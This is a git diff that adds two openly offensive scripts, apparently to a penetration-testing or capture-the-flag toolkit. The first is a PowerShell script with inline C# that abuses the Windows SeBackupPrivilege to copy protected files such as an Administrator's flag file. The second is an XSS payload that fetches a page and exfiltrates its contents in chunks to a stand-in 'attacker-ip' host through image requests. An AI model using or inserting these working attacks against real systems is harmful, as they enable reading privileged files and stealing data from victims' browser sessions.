diff --git a/SEBACKUPprivilege.ps1 b/SEBACKUPprivilege.ps1
new file mode 100644
index 0000000..20f5af5
--- /dev/null
+++ b/SEBACKUPprivilege.ps1
@@ -0,0 +1,40 @@
+# this script can help u abusing SEBACKUPprivilege on windows, by allowing u to copy any file
+# Usage:
+#1- copy and pase this in ur powershell terminal and then:
+# [BackupCopy]::Copy("C:\Users\Administrator\Desktop\root.txt", "C:\Temp\root-copy.txt")
+Add-Type -TypeDefinition @"
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using Microsoft.Win32.SafeHandles;
+
+public class BackupCopy {
+    [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)]
+    public static extern SafeFileHandle CreateFile(
+        string lpFileName,
+        uint dwDesiredAccess,
+        uint dwShareMode,
+        IntPtr SecurityAttributes,
+        uint dwCreationDisposition,
+        uint dwFlagsAndAttributes,
+        IntPtr hTemplateFile
+    );
+
+    public static void Copy(string source, string dest) {
+        const uint GENERIC_READ = 0x80000000;
+        const uint FILE_SHARE_READ = 0x00000001;
+        const uint OPEN_EXISTING = 3;
+        const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;
+
+        var handle = CreateFile(source, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
+        if (handle.IsInvalid)
+            throw new IOException("Access denied or file not found: " + source);
+
+        using (var fs = new FileStream(handle, FileAccess.Read))
+        using (var outFile = new FileStream(dest, FileMode.Create, FileAccess.Write)) {
+            fs.CopyTo(outFile);
+        }
+    }
+}
+"@
+
diff --git a/xss-data-extract2.js b/xss-data-extract2.js
new file mode 100644
index 0000000..1dc8a74
--- /dev/null
+++ b/xss-data-extract2.js
@@ -0,0 +1,17 @@
+// this can help bypassing CORS (make sure to host this script on https server in the real world)
+
+let html = "";
+
+fetch("/path/to/page/u-want-to-extract/")
+  .then(res => res.text())
+  .then(data => {
+    html = data;
+
+    // Chunk and exfil using image requests
+    const chunks = html.match(/.{1,1500}/gs); // ~1.5KB safe chunk size
+    chunks.forEach((chunk, i) => {
+      new Image().src = `https://attacker-ip/?part=${i}&data=` + encodeURIComponent(chunk);
+    });
+  });
+
+// this will extract the page in url encoded chunks (GET safe)